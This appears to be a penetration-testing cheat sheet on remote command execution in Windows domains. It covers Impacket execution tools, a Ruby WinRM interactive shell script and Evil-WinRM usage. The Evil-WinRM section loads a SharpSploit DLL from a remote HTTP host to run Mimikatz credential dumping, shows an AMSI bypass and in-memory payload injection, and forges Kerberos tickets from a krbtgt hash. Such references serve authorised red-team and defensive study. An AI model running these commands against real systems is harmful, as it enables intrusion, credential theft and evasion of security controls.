Remote Execution Techniques

Impacket tools

https://www.secureauth.com/labs/open-source-tools/impacket
# psexec
# PSEXEC like functionality example using RemComSvc(https://github.com/kavika13/RemCom).
psexec.py domain/user:password@IP <command>
# smbexec
# A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. 
# Instantiating a local smbserver to receive the output of the commands. 
# This is useful in the situation where the target machine does NOT have a writeable share available.
smbexec.py domain/user:password@IP <command>
# atexec
# This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
atexec.py domain/user:password@IP <command>
# wmiexec
# A semi-interactive shell, used through Windows Management Instrumentation. 
# It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.
wmiexec.py domain/user:password@IP <command>
# dcomexec
# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. 
##  Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.
dcomexec.py domain/user:password@IP <command>


WinRM

# You can use WinRM to execute remote commands and even get a shell
# Port 5985 needs to be opended
# Default endpoint is /wsman
require 'winrm'

conn = WinRM::Connection.new( 
  endpoint: 'http://ip:5985/wsman',
  user: 'domain/user',
  password: 'password',
)

command=""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        print "PS > "
        command = gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end    
    puts "Exiting with code #{output.exitcode}"
end


Evil-WinRm

# Evil-WinRM is another complete tool for WinRIM
https://github.com/Hackplayers/evil-winrm

# Simple usage
$ ruby evil-winrm.rb -i 10.10.10.172 -u user -p password

# Upload and Download
> upload local_filename (destination_filename)
> download remote_filename (destination_filename)

# List all services showing if there your account has permissions over each one
> services

# Menu listing loaded modules (default presented below)
> menu 
# You can load local PS1 scripts just by typing script name
# The scripts must be in the path set at -s argument
> Powerview.ps1
> menu
# Using advanced commands

# Invoke-Binary
# Allows exes compiled from c# to be executed in memory
# The executables must be in the path set at -e argument
> Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'

# DLL Loader
# allows loading dll libraries in memory. The dll file can be hosted by smb, http or locally.
# You can then use auto-completion
> Dll-Loader -http -path http://xx.xx.xx.xx/sharpsploit.dll
> [Sharpsploit.Credentials.Mimikatz]::LogonPasswords()

# Donut Loader
# allows to inject x64 payloads generated with awesome donut technique
# No need to encode the payload.bin, just generate and inject
https://github.com/Hackplayers/Salsa-tools/blob/master/Donut-Maker/donut-maker.py
python3 donut-maker.py covenant.exe

# Bypass-4MSI
# patchs AMSI protection
> amsiscanbuffer
> Bypass-4MSI
> amsiscanbuffer
# Using Kerberos

# First, date synchro
rdate -n <dc-ip>

# Ticket generation (ticketer, kirbi rubeus or mimikatz...)
ticketer.py -dc-ip <dc_ip> -nthash <krbtgt_nthash> -domain-sid <domain_sid> -domain <domain_name> <user>
python ticket_converter.py ticket.kirbi ticket.ccache

# Add ccache ticket (2 ways)
export KRB5CCNAME=/foo/var/ticket.ccache
cp ticket.ccache /tmp/krb5cc_0

# Add realm to /etc/krb5.conf (for linux). Use of this format is important
CONTOSO.COM = {
             kdc = fooserver.contoso.com
 }

# Check ticket
klist